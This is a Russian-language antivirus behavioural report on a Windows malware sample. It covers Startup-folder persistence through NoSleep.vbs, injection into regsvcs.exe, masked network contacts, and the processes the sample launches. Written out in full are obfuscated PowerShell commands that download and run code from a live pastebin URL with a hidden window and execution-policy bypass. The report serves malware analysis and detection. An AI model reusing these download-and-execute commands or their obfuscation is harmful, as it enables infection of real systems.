Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- %APPDATA%\microsoft\windows\start menu\programs\startup\nosleep.vbs
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (New-Object('N'+'et.W'+'eb'+'Client')).'DoWnloAdsTrInG'('https://pastebin.com/raw/bmt1raPf')
Внедряет код в
следующие системные процессы:
- %WINDIR%\microsoft.net\framework\v4.0.30319\regsvcs.exe
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\nosleep.vbs
Сетевая активность
TCP
- 'pa###bin.com':443
- 'e.###4top.io':443
- 'i.###4top.io':443
- 'pp####t2.ddns.net':8899
UDP
- DNS ASK pa###bin.com
- DNS ASK e.###4top.io
- DNS ASK i.###4top.io
- DNS ASK pp####t2.ddns.net
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\wscript.exe' "%APPDATA%\NoSleep.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (New-Object('N'+'et.W'+'eb'+'Client')).'DoWnloAdsTrInG'('https://pastebin.com/raw/bmt1raPf')' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -windowstyle hidden -noexit -executionpolicy bypass -command I`EX ((neW`-Obj`EcT (('N'+'et'+'.'+'We'+'bc'+'li'+'ent'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'t'+'ri'+'n'+'g')).InVokE((('ht'+'t...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -windowstyle hidden -noexit -executionpolicy bypass -command I`EX ((neW`-Obj`EcT (('N'+'et'+'.'+'We'+'bc'+'li'+'ent'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'t'+'ri'+'n'+'g')).InVokE((('ht'+'t...
- '%WINDIR%\microsoft.net\framework\v4.0.30319\regsvcs.exe'
